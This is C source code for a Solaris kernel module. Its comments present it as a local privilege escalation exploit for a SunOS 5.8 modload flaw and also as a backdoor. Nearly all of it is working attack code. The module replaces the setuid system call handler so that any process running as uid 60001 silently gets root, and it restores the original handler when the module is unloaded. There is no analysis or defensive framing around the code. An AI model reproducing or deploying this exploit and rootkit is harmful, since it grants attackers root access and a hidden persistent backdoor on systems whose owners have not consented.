//SunOS 5.8 modload exploit
//This code can be used for backdooring too
//By Someone [at] k-elektronik
//http://www.securityfocus.com/bid/9477
//It seems no exploit available on bugtraq
//Ripping solaris modules from slkm THC
//This flaw allows unpriviledge local user to cause kernel modules to be loaded
// "modload" this modules, then user with uid 60001 has a root priviledge

#include <sys/systm.h>
#include <sys/ddi.h>
#include <sys/sunddi.h>
#include <sys/syscall.h>
#include <sys/kmem.h>
#include <sys/errno.h>
#include <sys/modctl.h>
#define MUID 60001

//This code makes local user with uid 60001 to be root (0)
extern struct mod_ops mod_miscops;

int (*oldsetuid) (uid_t);

int newsetuid(uid_t uid)
{
    if (uid == MUID) {
        seteuid(0);
        setgid(0);
        setegid(0);
        return oldsetuid(0);
    }
    return oldsetuid(uid);
}

static struct modlmisc modlmisc =
{
    &mod_miscops,
};

static struct modlinkage modlinkage =
{
    MODREV_1,
    (void *) &modlmisc,
    NULL
};


int _init(void)
{
	int i;
	if (( i = mod_install(&modlinkage)) != 0)
	        cmn_err(CE_NOTE, "Could not install module\n");
	oldsetuid = (void *) sysent[SYS_setuid].sy_callc;
	sysent[SYS_setuid].sy_callc = (void *) newsetuid;
	return i;
}

int _info(struct modinfo *modinfop)
{
    return (mod_info(&modlinkage, modinfop));
}

int _fini(void)
{
    int i;

    if ((i = mod_remove(&modlinkage)) != 0)
        cmn_err(CE_NOTE, "Could not remove module\n");
     sysent[SYS_setuid].sy_callc = (void *) oldsetuid;
    return i;
}